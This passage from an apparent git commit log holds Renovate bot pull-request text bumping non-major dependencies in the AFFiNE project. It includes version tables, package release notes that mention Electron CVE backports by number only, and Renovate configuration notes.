| [uuid](https://togithub.com/uuid-rs/uuid ) | `1.9.1` -> `1.10.0` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | minor |
| [vitest-fetch-mock](https://togithub.com/IanVS/vitest-fetch-mock ) | [`^0.2.2` -> `^0.3.0`](https://renovatebot.com/diffs/npm/vitest-fetch-mock/0.2.2/0.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
---
### Release Notes
<details>
<summary>aws/aws-sdk-js-v3 (@​aws-sdk/client-s3)</summary>
### [`v3.614.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36140-2024-07-10 )
[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.613.0...v3.614.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://togithub.com/aws-sdk/client-s3 )
### [`v3.613.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36130-2024-07-09 )
[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.609.0...v3.613.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://togithub.com/aws-sdk/client-s3 )
</details>
<details>
<summary>fal-ai/fal-js (@​fal-ai/serverless-client)</summary>
### [`v0.13.0`](4ea43b4cea...cf300e9cc0 )
[Compare Source](4ea43b4cea...cf300e9cc0 )
</details>
<details>
<summary>GoogleCloudPlatform/opentelemetry-operations-js (@​google-cloud/opentelemetry-cloud-monitoring-exporter)</summary>
### [`v0.19.0`](https://togithub.com/GoogleCloudPlatform/opentelemetry-operations-js/compare/@google-cloud/opentelemetry-cloud-monitoring-exporter@0.18.0...@google-cloud/opentelemetry-cloud-monitoring-exporter@0.19.0 )
[Compare Source](https://togithub.com/GoogleCloudPlatform/opentelemetry-operations-js/compare/@google-cloud/opentelemetry-cloud-monitoring-exporter@0.18.0...@google-cloud/opentelemetry-cloud-monitoring-exporter@0.19.0 )
</details>
<details>
<summary>napi-rs/napi-rs (@​napi-rs/cli)</summary>
### [`v3.0.0-alpha.58`](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.57...@napi-rs/cli@3.0.0-alpha.58 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.57...@napi-rs/cli@3.0.0-alpha.58 )
### [`v3.0.0-alpha.57`](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.56...@napi-rs/cli@3.0.0-alpha.57 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.56...@napi-rs/cli@3.0.0-alpha.57 )
</details>
<details>
<summary>nrwl/nx (@​nx/vite)</summary>
### [`v19.4.3`](https://togithub.com/nrwl/nx/releases/tag/19.4.3 )
[Compare Source](https://togithub.com/nrwl/nx/compare/19.4.2...19.4.3 )
#### 19.4.3 (2024-07-12)
##### 🚀 Features
- **core:** avoid forking process for nx:noop ([#​26869](https://togithub.com/nrwl/nx/pull/26869 ))
- **js:** add createNodesV2 for typescript plugin ([#​26788](https://togithub.com/nrwl/nx/pull/26788 ))
- **nx-dev:** add customers & company pages ([#​26813](https://togithub.com/nrwl/nx/pull/26813 ))
- **nx-dev:** Add more OSS logos ([#​26922](https://togithub.com/nrwl/nx/pull/26922 ))
##### 🩹 Fixes
- **core:** load isolated plugins in parallel ([#​26874](https://togithub.com/nrwl/nx/pull/26874 ))
- **core:** report should work if project graph errors ([#​26858](https://togithub.com/nrwl/nx/pull/26858 ))
- **misc:** properly set the value of the bitbucket option for ci work… ([#​26890](https://togithub.com/nrwl/nx/pull/26890 ))
- **misc:** add more ab testing for setting up ci and nx cloud ([#​26907](https://togithub.com/nrwl/nx/pull/26907 ))
- **vite:** Only attempt to amend test object if one exists ([#​26822](https://togithub.com/nrwl/nx/pull/26822 ))
- **vue:** bump vue-tsc version to 2.x.x ([#​26867](https://togithub.com/nrwl/nx/pull/26867 ))
##### ❤️ Thank You
- Craigory Coppola [@​AgentEnder](https://togithub.com/AgentEnder )
- Jason Jean [@​FrozenPandaz](https://togithub.com/FrozenPandaz )
- Jasper McCulloch
- Leosvel Pérez Espinosa [@​leosvelperez](https://togithub.com/leosvelperez )
- Nicholas Cunningham [@​ndcunningham](https://togithub.com/ndcunningham )
### [`v19.4.2`](https://togithub.com/nrwl/nx/releases/tag/19.4.2 )
[Compare Source](https://togithub.com/nrwl/nx/compare/19.4.1...19.4.2 )
#### 19.4.2 (2024-07-08)
##### 🚀 Features
- **core:** add support for wildcards in dependsOn ([#​19611](https://togithub.com/nrwl/nx/pull/19611 ))
- **linter:** support `eslint.config.cjs` and `*.cjs` extension with flat config ([#​26637](https://togithub.com/nrwl/nx/pull/26637 ))
##### 🩹 Fixes
- **core:** ensure better create nodes error messaging ([#​26811](https://togithub.com/nrwl/nx/pull/26811 ))
- **misc:** adjust nx cloud ab test ([#​26866](https://togithub.com/nrwl/nx/pull/26866 ))
##### ❤️ Thank You
- Ben Snyder
- Craigory Coppola [@​AgentEnder](https://togithub.com/AgentEnder )
- Jason Jean [@​FrozenPandaz](https://togithub.com/FrozenPandaz )
- Pavlo [@​fxposter](https://togithub.com/fxposter )
</details>
<details>
<summary>microsoft/playwright (@​playwright/test)</summary>
### [`v1.45.1`](https://togithub.com/microsoft/playwright/compare/v1.45.0...e8989f83d9801cdaadc3803b5341c601c9593947 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.45.0...v1.45.1 )
### [`v1.45.0`](https://togithub.com/microsoft/playwright/compare/v1.44.1...4f3f6eecae490af444dd9298c9eaeb0c596915b7 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.44.1...v1.45.0 )
</details>
<details>
<summary>storybookjs/test-runner (@​storybook/test-runner)</summary>
### [`v0.19.1`](https://togithub.com/storybookjs/test-runner/releases/tag/v0.19.1 )
[Compare Source](https://togithub.com/storybookjs/test-runner/compare/v0.19.0...v0.19.1 )
##### 🐛 Bug Fix
- Release 0.19.1 [#​493](https://togithub.com/storybookjs/test-runner/pull/493 ) ([@​paulgv](https://togithub.com/paulgv ) [@​yannbf](https://togithub.com/yannbf ))
- fix(deps): upgrade `@storybook/csf` to v0.1.11 [#​491](https://togithub.com/storybookjs/test-runner/pull/491 ) ([@​paulgv](https://togithub.com/paulgv ))
##### Authors: 2
- Paul Gascou-Vaillancourt ([@​paulgv](https://togithub.com/paulgv ))
- Yann Braga ([@​yannbf](https://togithub.com/yannbf ))
</details>
<details>
<summary>electron/electron (electron)</summary>
### [`v30.2.0`](https://togithub.com/electron/electron/releases/tag/v30.2.0 ): electron v30.2.0
[Compare Source](https://togithub.com/electron/electron/compare/v30.1.2...v30.2.0 )
##### Release Notes for v30.2.0
##### Features
- Enabled the Windows Control Overlay API on Linux. [#​42683](https://togithub.com/electron/electron/pull/42683 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42682 ), [32](https://togithub.com/electron/electron/pull/42681 ))</span>
- Expose `systemPreferences` to `utilityProcess`. [#​42600](https://togithub.com/electron/electron/pull/42600 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42598 ), [32](https://togithub.com/electron/electron/pull/42599 ))</span>
##### Fixes
- Fixed a focus issue when calling `BrowserWindow.setTopBrowserView`. [#​42735](https://togithub.com/electron/electron/pull/42735 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42734 ), [32](https://togithub.com/electron/electron/pull/42733 ))</span>
- Fixed an issue where `fetch`-dependent interfaces could be missing in Web Workers with `nodeIntegrationInWorker` enabled. [#​42596](https://togithub.com/electron/electron/pull/42596 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42597 ), [32](https://togithub.com/electron/electron/pull/42595 ))</span>
- Fixed an issue where `navigator.mediaDevices.enumerateDevices` could return broken results in some cases after calling `session.setPermissionCheckHandler`. [#​42807](https://togithub.com/electron/electron/pull/42807 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42809 ), [32](https://togithub.com/electron/electron/pull/42808 ))</span>
- Fixed an issue where control could fail to return properly after saving a dialog using showOpenDialogSync on Linux. [#​42676](https://togithub.com/electron/electron/pull/42676 ) <span style="font-size:small;">(Also in [29](https://togithub.com/electron/electron/pull/42679 ), [31](https://togithub.com/electron/electron/pull/42678 ), [32](https://togithub.com/electron/electron/pull/42677 ))</span>
- Fixed an issue where the user-specified default path did not work in some circumstances when using Linux dialogs. [#​42687](https://togithub.com/electron/electron/pull/42687 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42685 ), [32](https://togithub.com/electron/electron/pull/42680 ))</span>
- Fixed potentially incorrect exit code in UtilityProcess. [#​42395](https://togithub.com/electron/electron/pull/42395 ) <span style="font-size:small;">(Also in [29](https://togithub.com/electron/electron/pull/42396 ), [31](https://togithub.com/electron/electron/pull/42397 ))</span>
##### Other Changes
- Security: backported fix for CVE-2024-5493. [#​42590](https://togithub.com/electron/electron/pull/42590 )
- Security: backported fix for CVE-2024-5831.
- Security: backported fix for CVE-2024-5832. [#​42602](https://togithub.com/electron/electron/pull/42602 )
- Security: backported fix for CVE-2024-6100.
- Security: backported fix for CVE-2024-6101.
- Security: backported fix for CVE-2024-6103. [#​42617](https://togithub.com/electron/electron/pull/42617 )
- Security: backported fix for CVE-2024-6291.
- Security: backported fix for CVE-2024-6293.
- Security: backported fix for CVE-2024-6290.
- Security: backported fix for CVE-2024-6292.
- Security: backported fix for chromium:346197738. [#​42693](https://togithub.com/electron/electron/pull/42693 )
- Updated Node.js to v20.15.0. [#​42613](https://togithub.com/electron/electron/pull/42613 )
</details>
<details>
<summary>jotaijs/jotai-scope (jotai-scope)</summary>
### [`v0.7.0`](https://togithub.com/jotaijs/jotai-scope/compare/v0.6.0...v0.7.0 )
[Compare Source](https://togithub.com/jotaijs/jotai-scope/compare/v0.6.0...v0.7.0 )
</details>
<details>
<summary>lucide-icons/lucide (lucide-react)</summary>
### [`v0.408.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.408.0 ): New icons 0.408.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.407.0...0.408.0 )
#### New icons 🎨
- `monitor-cog` ([#​2310](https://togithub.com/lucide-icons/lucide/issues/2310 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
#### Modified Icons 🔨
- `church` ([#​2273](https://togithub.com/lucide-icons/lucide/issues/2273 )) by [@​jguddas](https://togithub.com/jguddas )
- `delete` ([#​2279](https://togithub.com/lucide-icons/lucide/issues/2279 )) by [@​jguddas](https://togithub.com/jguddas )
- `drafting-compass` ([#​2266](https://togithub.com/lucide-icons/lucide/issues/2266 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.407.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.407.0 ): New icons 0.407.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.406.0...0.407.0 )
#### New icons 🎨
- `type-outline` ([#​2206](https://togithub.com/lucide-icons/lucide/issues/2206 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.406.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.406.0 ): New icons 0.406.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.405.0...0.406.0 )
#### New icons 🎨
- `calendar-arrow-down` ([#​2307](https://togithub.com/lucide-icons/lucide/issues/2307 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `calendar-arrow-up` ([#​2307](https://togithub.com/lucide-icons/lucide/issues/2307 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `clock-arrow-down` ([#​2307](https://togithub.com/lucide-icons/lucide/issues/2307 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `clock-arrow-up` ([#​2307](https://togithub.com/lucide-icons/lucide/issues/2307 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.405.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.405.0 ): New icons 0.405.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.404.0...0.405.0 )
#### New icons 🎨
- `user-pen` ([#​2303](https://togithub.com/lucide-icons/lucide/issues/2303 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `user-round-pen` ([#​2303](https://togithub.com/lucide-icons/lucide/issues/2303 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.404.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.404.0 ): New icons 0.404.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.403.0...0.404.0 )
#### New icons 🎨
- `folder-code` ([#​2276](https://togithub.com/lucide-icons/lucide/issues/2276 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.403.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.403.0 ): New icons 0.403.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.402.0...0.403.0 )
#### New icons 🎨
- `list-check` ([#​2291](https://togithub.com/lucide-icons/lucide/issues/2291 )) by [@​guanboo-yang](https://togithub.com/guanboo-yang )
### [`v0.402.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.402.0 ): New icons 0.402.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.401.0...0.402.0 )
#### New icons 🎨
- `wifi-high` ([#​2157](https://togithub.com/lucide-icons/lucide/issues/2157 )) by [@​VirtCode](https://togithub.com/VirtCode )
- `wifi-low` ([#​2157](https://togithub.com/lucide-icons/lucide/issues/2157 )) by [@​VirtCode](https://togithub.com/VirtCode )
- `wifi-zero` ([#​2157](https://togithub.com/lucide-icons/lucide/issues/2157 )) by [@​VirtCode](https://togithub.com/VirtCode )
### [`v0.401.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.401.0 ): New icons 0.401.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.400.0...0.401.0 )
#### New icons 🎨
- `scan-qr-code` ([#​2247](https://togithub.com/lucide-icons/lucide/issues/2247 )) by [@​vexkiddy](https://togithub.com/vexkiddy )
#### Modified Icons 🔨
- `book-a` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-audio` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-check` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-copy` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-dashed` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-down` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-headphones` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-heart` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-image` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-key` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-lock` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-marked` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-minus` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-plus` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-text` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-type` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-up-2` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-up` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-user` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book-x` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `book` ([#​2274](https://togithub.com/lucide-icons/lucide/issues/2274 )) by [@​jguddas](https://togithub.com/jguddas )
- `circle-power` ([#​2285](https://togithub.com/lucide-icons/lucide/issues/2285 )) by [@​jguddas](https://togithub.com/jguddas )
- `key-round` ([#​2278](https://togithub.com/lucide-icons/lucide/issues/2278 )) by [@​jguddas](https://togithub.com/jguddas )
- `octagon-alert` ([#​2280](https://togithub.com/lucide-icons/lucide/issues/2280 )) by [@​jguddas](https://togithub.com/jguddas )
- `octagon-pause` ([#​2280](https://togithub.com/lucide-icons/lucide/issues/2280 )) by [@​jguddas](https://togithub.com/jguddas )
- `octagon-x` ([#​2280](https://togithub.com/lucide-icons/lucide/issues/2280 )) by [@​jguddas](https://togithub.com/jguddas )
- `octagon` ([#​2280](https://togithub.com/lucide-icons/lucide/issues/2280 )) by [@​jguddas](https://togithub.com/jguddas )
- `signature` ([#​2293](https://togithub.com/lucide-icons/lucide/issues/2293 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `square-power` ([#​2285](https://togithub.com/lucide-icons/lucide/issues/2285 )) by [@​jguddas](https://togithub.com/jguddas )
</details>
<details>
<summary>nodejs/node (node)</summary>
### [`v20.15.1`](https://togithub.com/nodejs/node/compare/v20.15.0...v20.15.1 )
[Compare Source](https://togithub.com/nodejs/node/compare/v20.15.0...v20.15.1 )
</details>
<details>
<summary>serde-rs/serde (serde)</summary>
### [`v1.0.204`](https://togithub.com/serde-rs/serde/releases/tag/v1.0.204 )
[Compare Source](https://togithub.com/serde-rs/serde/compare/v1.0.203...v1.0.204 )
- Apply #\[diagnostic::on_unimplemented] attribute on Rust 1.78+ to suggest adding serde derive or enabling a "serde" feature flag in dependencies ([#​2767](https://togithub.com/serde-rs/serde/issues/2767 ), thanks [@​weiznich](https://togithub.com/weiznich ))
</details>
<details>
<summary>hipstersmoothie/storybook-dark-mode (storybook-dark-mode)</summary>
### [`v4.0.2`](https://togithub.com/hipstersmoothie/storybook-dark-mode/blob/HEAD/CHANGELOG.md#v402-Wed-Jun-19-2024 )
[Compare Source](https://togithub.com/hipstersmoothie/storybook-dark-mode/compare/v4.0.1...v4.0.2 )
##### 🐛 Bug Fix
- Fix for the "Storybook preview hooks can only be called inside decorators and story functions." error [#​279](https://togithub.com/hipstersmoothie/storybook-dark-mode/pull/279 ) ([@​adam-golab](https://togithub.com/adam-golab ))
##### Authors: 1
- Adam Gołąb ([@​adam-golab](https://togithub.com/adam-golab ))
***
</details>
<details>
<summary>uuid-rs/uuid (uuid)</summary>
### [`v1.10.0`](https://togithub.com/uuid-rs/uuid/releases/tag/1.10.0 )
[Compare Source](https://togithub.com/uuid-rs/uuid/compare/1.9.1...1.10.0 )
##### Deprecations
This release deprecates and renames the following functions:
- `Builder::from_rfc4122_timestamp` -> `Builder::from_gregorian_timestamp`
- `Builder::from_sorted_rfc4122_timestamp` -> `Builder::from_sorted_gregorian_timestamp`
- `Timestamp::from_rfc4122` -> `Timestamp::from_gregorian`
- `Timestamp::to_rfc4122` -> `Timestamp::to_gregorian`
##### What's Changed
- Use const identifier in uuid macro by [@​Vrajs16](https://togithub.com/Vrajs16 ) in [https://github.com/uuid-rs/uuid/pull/764 ](https://togithub.com/uuid-rs/uuid/pull/764 )
- Rename most methods referring to RFC4122 by [@​Mikopet](https://togithub.com/Mikopet ) / [@​KodrAus](https://togithub.com/KodrAus ) in [https://github.com/uuid-rs/uuid/pull/765 ](https://togithub.com/uuid-rs/uuid/pull/765 )
- prepare for 1.10.0 release by [@​KodrAus](https://togithub.com/KodrAus ) in [https://github.com/uuid-rs/uuid/pull/766 ](https://togithub.com/uuid-rs/uuid/pull/766 )
##### New Contributors
- [@​Vrajs16](https://togithub.com/Vrajs16 ) made their first contribution in [https://github.com/uuid-rs/uuid/pull/764 ](https://togithub.com/uuid-rs/uuid/pull/764 )
**Full Changelog**: https://github.com/uuid-rs/uuid/compare/1.9.1...1.10.0
</details>
<details>
<summary>IanVS/vitest-fetch-mock (vitest-fetch-mock)</summary>
### [`v0.3.0`](https://togithub.com/IanVS/vitest-fetch-mock/releases/tag/v0.3.0 )
[Compare Source](https://togithub.com/IanVS/vitest-fetch-mock/compare/v0.2.2...v0.3.0 )
#### Breaking changes
- Support Vitest 2
- Require Node 18 and above
#### Fixes
- Better TypeScript support
#### PRs:
- Update to vitest 2 by [@​birtles](https://togithub.com/birtles ) in [https://github.com/IanVS/vitest-fetch-mock/pull/18 ](https://togithub.com/IanVS/vitest-fetch-mock/pull/18 )
- Update dependencies by [@​IanVS](https://togithub.com/IanVS ) in [https://github.com/IanVS/vitest-fetch-mock/pull/20 ](https://togithub.com/IanVS/vitest-fetch-mock/pull/20 )
- Update node versions tested in CI by [@​IanVS](https://togithub.com/IanVS ) in [https://github.com/IanVS/vitest-fetch-mock/pull/19 ](https://togithub.com/IanVS/vitest-fetch-mock/pull/19 )
- Fix: move index.d.ts alongside index.js main entry by [@​drwpow](https://togithub.com/drwpow ) in [https://github.com/IanVS/vitest-fetch-mock/pull/11 ](https://togithub.com/IanVS/vitest-fetch-mock/pull/11 )
#### New Contributors
- [@​birtles](https://togithub.com/birtles ) made their first contribution in [https://github.com/IanVS/vitest-fetch-mock/pull/18 ](https://togithub.com/IanVS/vitest-fetch-mock/pull/18 )
- [@​drwpow](https://togithub.com/drwpow ) made their first contribution in [https://github.com/IanVS/vitest-fetch-mock/pull/11 ](https://togithub.com/IanVS/vitest-fetch-mock/pull/11 )
**Full Changelog**: https://github.com/IanVS/vitest-fetch-mock/compare/v0.2.2...v0.3.0
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View repository job log [here](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzNy40MzEuNCIsInVwZGF0ZWRJblZlciI6IjM3LjQzMS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->
2024-07-15 15:22:52 +00:00
DarkSky
1f50c1b890
fix: handle gql error correctly ( #7507 )
2024-07-15 09:24:43 +00:00
renovate
b50c57a3fa
chore: bump up all non-major dependencies ( #7433 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.609.0` -> `3.614.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.609.0/3.614.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.609.0` -> `3.614.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.609.0/3.614.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@fal-ai/serverless-client](https://togithub.com/fal-ai/fal-js ) ([source](https://togithub.com/fal-ai/fal-js/tree/HEAD/libs/client )) | [`^0.12.0` -> `^0.13.0`](https://renovatebot.com/diffs/npm/@fal-ai%2fserverless-client/0.12.0/0.13.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@google-cloud/opentelemetry-cloud-monitoring-exporter](https://togithub.com/GoogleCloudPlatform/opentelemetry-operations-js ) | [`^0.18.0` -> `^0.19.0`](https://renovatebot.com/diffs/npm/@google-cloud%2fopentelemetry-cloud-monitoring-exporter/0.18.0/0.19.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@google-cloud/opentelemetry-cloud-trace-exporter](https://togithub.com/GoogleCloudPlatform/opentelemetry-operations-js ) | [`2.2.0` -> `2.3.0`](https://renovatebot.com/diffs/npm/@google-cloud%2fopentelemetry-cloud-trace-exporter/2.2.0/2.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@google-cloud/opentelemetry-resource-util](https://togithub.com/GoogleCloudPlatform/opentelemetry-operations-js ) | [`2.2.0` -> `2.3.0`](https://renovatebot.com/diffs/npm/@google-cloud%2fopentelemetry-resource-util/2.2.0/2.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@marsidev/react-turnstile](https://togithub.com/marsidev/react-turnstile ) | [`0.7.1` -> `0.7.2`](https://renovatebot.com/diffs/npm/@marsidev%2freact-turnstile/0.7.1/0.7.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@napi-rs/cli](https://togithub.com/napi-rs/napi-rs ) | [`3.0.0-alpha.56` -> `3.0.0-alpha.58`](https://renovatebot.com/diffs/npm/@napi-rs%2fcli/3.0.0-alpha.56/3.0.0-alpha.58 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@nx/vite](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/vite )) | [`19.4.1` -> `19.4.3`](https://renovatebot.com/diffs/npm/@nx%2fvite/19.4.1/19.4.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@playwright/test](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.45.1`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.44.1/1.45.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@prisma/client](https://www.prisma.io ) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/client )) | [`5.16.1` -> `5.16.2`](https://renovatebot.com/diffs/npm/@prisma%2fclient/5.16.1/5.16.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@prisma/instrumentation](https://www.prisma.io ) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/instrumentation )) | [`5.16.1` -> `5.16.2`](https://renovatebot.com/diffs/npm/@prisma%2finstrumentation/5.16.1/5.16.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
